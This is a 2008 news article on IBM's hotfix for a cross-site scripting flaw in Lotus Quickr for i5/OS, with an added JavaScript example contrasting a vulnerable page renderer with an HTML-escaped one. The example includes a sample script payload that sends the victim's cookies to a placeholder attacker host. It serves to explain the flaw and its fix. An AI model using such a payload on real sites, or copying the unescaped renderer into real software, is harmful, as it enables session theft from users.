IBM Patches Security Flaw in Quickr for i5/OS
February 26, 2008 Alex Woodie
IBM has issued a patch for a cross-site scripting security vulnerability in Lotus Quickr for i5/OS, the computer security research and development company Secunia reported last week. The flaw was given a “less critical” rating. Meanwhile, another security flaw in i5/OS reported earlier this month has been partially patched by IBM.
According to a Secunia advisory published last week, a security vulnerability in Lotus Quickr for i5/OS version 8 can be exploited to conduct cross-site scripting attacks. The problem is the result of certain input not being properly validated before it is returned to a user when anonymous access is disabled on HTTP ports, Secunia says. As a result, an attacker can inject arbitrary HTML and script into the Web pages served to other users; that script then runs in the victim's browser in the context of the Quickr site.
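The pattern Secunia describes, user-supplied input echoed back into a page without validation or encoding, is the classic reflected cross-site scripting bug. The following is an added illustration of that pattern and of the usual fix, output encoding at the point of rendering; it is generic example code written for this article, not Lotus Quickr's implementation, and the page layout, the `name` parameter and the sample payload are all constructed for the example.

```javascript
// Added example: reflected XSS caused by echoing an unvalidated request
// parameter, beside the hardened form. Not Lotus Quickr code; the page,
// parameter name and payload below are constructed for illustration.

// Escape the five characters that let a value break out of HTML text or
// attribute context. Encoding at render time is the standard remedy.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the 'name' query parameter is concatenated straight into the
// response body, so a crafted link executes script in the victim's browser.
function renderVulnerable(query) {
  const name = query.get('name') ?? 'guest';
  return `<html><body><p>Welcome back, ${name}</p></body></html>`;
}

// Hardened: identical page, but the untrusted value is HTML-encoded first,
// so the browser displays the payload as text instead of executing it.
function renderHardened(query) {
  const name = escapeHtml(query.get('name') ?? 'guest');
  return `<html><body><p>Welcome back, ${name}</p></body></html>`;
}

// Small check a reviewer can run over a rendered page: does the untrusted
// value survive as raw markup anywhere in the output?
function containsRawMarkup(html, payload) {
  return html.includes(payload);
}

// Constructed sample request: the kind of link an attacker would send to a
// logged-in user. The hostname is a placeholder, not a real site.
const payload = '<script>location="http://attacker.example/?c="+document.cookie</script>';
const sampleQuery = new URLSearchParams({ name: payload });

// Stand-alone demo: print both renderings for side-by-side comparison.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', renderVulnerable(sampleQuery));
  console.log('hardened:  ', renderHardened(sampleQuery));
}
```

Note that encoding is context-specific: the escaping above is correct for HTML text and quoted attribute values, but a value placed inside a script block, a URL or a CSS property needs the encoder for that context instead.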
The vulnerability is reported in Lotus Quickr for i5/OS versions prior to 18.104.22.168 Hotfix 11 on Domino version 7.0.2, according to Secunia. The problem is resolved with the application of Hotfix 11 for Lotus Quickr for i5/OS.
The discovery of the cross-site scripting flaw in Lotus Quickr for i5/OS led to the discovery of another cross-site scripting flaw in Lotus Quickr version 8 and Lotus QuickPlace version 7, according to Secunia. The security firm says an Avnet researcher found a problem with the way the products handle the “OpenDocument” command. The flaw was reported just yesterday, and is currently marked as not patched.
This is the second reported security flaw in i5/OS or an IBM i5/OS application this month. In early February, IBM reported a flaw in the HTTP Server in i5/OS V5R3 and V5R4 that could lead to cross-site scripting attacks. That flaw was patched for V5R3 by IBM a week and a half ago, according to Secunia, but not for V5R4.
Lotus Quickr is one of a new class of Web 2.0 applications to make their way to the System i platform. The product, which was launched last June to much IBM fanfare, is designed to allow business users to view, edit, share, and distribute their documents and ideas using Web 2.0-style interfaces, such as blogs, wikis, and RSS feeds, along with their Lotus or Microsoft e-mail.